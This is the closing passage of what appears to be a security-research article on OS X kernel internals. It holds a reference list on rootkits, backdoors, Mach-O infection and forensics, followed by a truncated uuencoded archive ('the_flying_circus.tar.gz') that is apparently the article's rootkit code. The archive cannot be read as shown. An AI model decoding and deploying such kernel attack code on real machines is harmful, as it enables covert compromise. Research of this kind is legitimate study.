[11] fG!, Secuinside 2012, How to Start your Apple reverse engineering
     adventure, http://reverse.put.as/wp-content/uploads/2012/07/Secuinside
     -2012-Presentation.pdf

[12] fG!, Hitcon 2012, Past and Future in OS X malware
     http://reverse.put.as/Hitcon_2012_Presentation.pdf

[13] Jonathan Levin, Mac OS X and iOS Internals
     Wiley & Sons, 2012, ISBN: 978-1-11805765-0

[14] Amit Singh, Mac OS X Internals
     Addison Wesley, 2007, ISBN: 0-321-27854-2

[15] Apple, dyld 210.2.3 source code
     http://www.opensource.apple.com/source/dyld/dyld-210.2.3/

[16] fG!, Anti-debug trick #1: Abusing Mach-O to crash GDB
     http://reverse.put.as/2012/01/31/anti-debug-trick-1-abusing-mach-o-to-
     crash-gdb/

[17] Apple, Network Kernel Extensions Programming Guide
     https://developer.apple.com/library/mac/#documentation/Darwin/Conceptu
     al/NKEConceptual/intro/intro.html#//apple_ref/doc/uid/TP40001858-CH225
     -DontLinkElementID_70

[18] Apple, tcplognke
     http://developer.apple.com/library/mac/#/legacy/mac/library/samplecode
     /tcplognke/Introduction/Intro.html

[19] Gil Dabah, diStorm - Powerful Disassembler Library For x86/AMD64
     http://code.google.com/p/distorm/

[20] McKusick et al, The Design and Implementation of the 4.4BSD Oper.
     System, Addison Wesley, 1996, ISBN: 0-201-54979-4

[21] fG!, Av-monster: the monster that loves yummy OS X anti-virus software
     http://reverse.put.as/2012/02/13/av-monster-the-monster-that-loves-yum
     my-os-x-anti-virus-software/

[22] Apple, Technical Note TN2127
     https://developer.apple.com/library/mac/#technotes/tn2127/_index.html

[23] Cantrill et al, Dynamic Instrumentation of Production Systems
     dtrace_usenix.pdf

[24] Oracle, Solaris Dynamic Tracing Guide
     https://wikis.oracle.com/display/DTrace/Documentation

[25] fG!, Abusing OS X TrustedBSD framework to install r00t backdoors...
     http://reverse.put.as/2011/09/18/abusing-os-x-trustedbsd-framework-to-
     install-r00t-backdoors/

 [26] Andrew Case, Mac Memory Analysis with Volatility
      http://reverse.put.as/wp-content/uploads/2011/06/sas-summit-mac-memor
      y-analysis-with-volatility.pdf

 [27] FreeBSD, FreeBSD Handbook
      http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/audit-confi
      g.html

 [28] Der Flounder, OpenBSD auditing on Mac OS X
      http://derflounder.wordpress.com/2012/01/30/openbsm-auditing-on-mac-o
      s-x/

 [29] OpenBSDM Source Code
      http://www.opensource.apple.com/source/OpenBSM/

 [30] Apple, Kernel Programming guide
      https://developer.apple.com/library/mac/#documentation/Darwin/Concept
      ual/KernelProgramming/vm/vm.html#//apple_ref/doc/uid/TP30000905-CH210
      -BEHJDFCA

 [31] Halvorsen, Ole Henry & Clarke, Dougles, OS X and iOS Kernel
      Programming, Apress, 2011, ISBN-10: 1430235365

 [32] Hoglund, Greg & Butler, Jamie, Rootkits: Subverting the Windows
      Kernel, Addison-Wesley, 2005, ISBN-10: 0321294319

 [33] Luka Milkovic, Defeating Windows memory forensics, 29C3
      http://events.ccc.de/congress/2012/Fahrplan/events/5301.en.html

 [34] fG!, OS.X/Boubou  Mach-O infector PoC source code
      http://reverse.put.as/2013/03/05/os-xboubou-mach-o-infector-poc-sourc
      e-code/

 [35] thegrugq, How the Leopard hides his spots
      http://reverse.put.as/wp-content/uploads/2011/06/D1T2-The-Grugq-How-t
      he-Leopard-Hides-His-Spots.pdf

--[ 10 - T3h l337 c0d3z

begin 644 the_flying_circus.tar.gz
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
